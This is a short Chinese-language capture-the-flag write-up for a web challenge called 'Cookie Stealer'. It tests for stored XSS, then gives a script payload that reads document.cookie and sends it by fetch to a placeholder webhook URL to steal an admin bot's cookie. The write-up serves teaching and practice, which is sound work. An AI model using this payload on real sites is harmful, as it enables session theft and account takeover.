# [CH] Cookie Stealer ###### tags: `Writeup` `Web` `Chinese` > [name=FlyDragon] ## Step.1 *_請不要更改網站內容，維護他人解題權益_ http://lotuxctf.com:20005/ 一開始是個普通的登入頁面，可以註冊或登入 <img src="https://hackmd.io/_uploads/BJ2Bo2W02.png" alt="photo" width="500" height="300" > 登入後可以上傳圖片和輸入內容 且可以 `Share` 或 `Share to admin` <img src="https://hackmd.io/_uploads/Sy7TohZAn.png" alt="photo" width="400" height="300" > 使用 `Share` 可以建立一個 `{username}.php` 的頁面 而 `Share to admin` 代表建立後 `admin` 會來拜訪你的頁面  有很多地方能夠上傳 Webshell ，但 RCE 也無法拿到 flag 本題需要利用 XSS 偷取 `admin` 的 Cookie ## Step.2 先測試是否能觸發 XSS ，輸入下列 javascript ``` <script>alert(1);</script> ``` <img src="https://hackmd.io/_uploads/HkJDgaZA2.png" alt="photo" width="400" height="" > 成功觸發  接著測試是否能偷取訪問者的 cookie ``` <script> var flag = document.cookie; fetch("{webhookurl}?cookie="+flag) </script> ``` > 注意: 你需要把 `{webhookurl}` 改成一個能接收請求的網站 e.g. https://webhook.site/ `Share` 後成功收到自己的 cookie  使用 `Share to admin` 即可收到 flag {%hackmd M1bgOPoiQbmM0JRHWaYA1g %}